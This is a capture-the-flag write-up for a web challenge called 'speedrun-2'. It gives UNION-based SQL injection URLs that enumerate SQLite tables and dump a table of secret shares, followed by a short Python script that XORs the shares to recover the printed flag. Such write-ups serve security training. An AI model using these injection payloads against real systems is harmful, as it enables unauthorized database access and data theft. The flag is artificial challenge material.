speedrun-2
Description
Solution
Looking at the script it is obvious this is an SQLi.
The course table does not seem to contain any values useful to us. Let's try searching for other tables:
http://challenges.ctfd.io:30026/?credits=1+union+select+1,2,3,tbl_name+FROM+sqlite_master
We notice there is table flag_xor_shares that looks interesting. Lets try viewing the structure of the table:
http://challenges.ctfd.io:30026/?credits=1+union+select+1,2,3,sql+FROM+sqlite_master+where+name=%27flag_xor_shares%27
http://challenges.ctfd.io:30026/?credits=1+union+select+id,hexdigest,3,4+from+flag_xor_shares
The contents of the table are secret shares. XORing them together should give us the flag. I wrote a quick script for this
from pwn import xor
KEY1 = bytes.fromhex("7419ccad9d5949e66614cd9458cdac149c2ad981c9f3ec56d30d03e730631c23598394a6055c55ecb5bec49dd0043b9fde76")
KEY2 = bytes.fromhex("835db37484676a462e223024a365c91fcdfe53ff975852abfacb79e0f3aef8d5b897a36c6fbfde9ca8e63b3ee00d3a1830f1")
key3 = bytes.fromhex("9c5890b6230771372122e9352ed1f3a1f644c9d4e451b81cb2f6643a067669972dc6a06617eaf08e539ada9a92b713b09b0c")
key4 = bytes.fromhex("53e5553b467e4badfcee4d97262445b27cdad3ced69a7fc69e0a04196685a61052cdd2f8a7a9650a0d861707f51403ccebc3")
key5 = bytes.fromhex("6dbdf9003a3c710afbc92a669f248c6fbe15fc550753264477436a5093614a2efc76310bb7906c911c305a0a39f566c8fc35")
flag = xor(KEY1, KEY2, key3, key4, key5)
print(flag.decode())
UDCTF{h0n3stly_we_l1k3_crypt0_a_bit_m0re_th4n_w3b}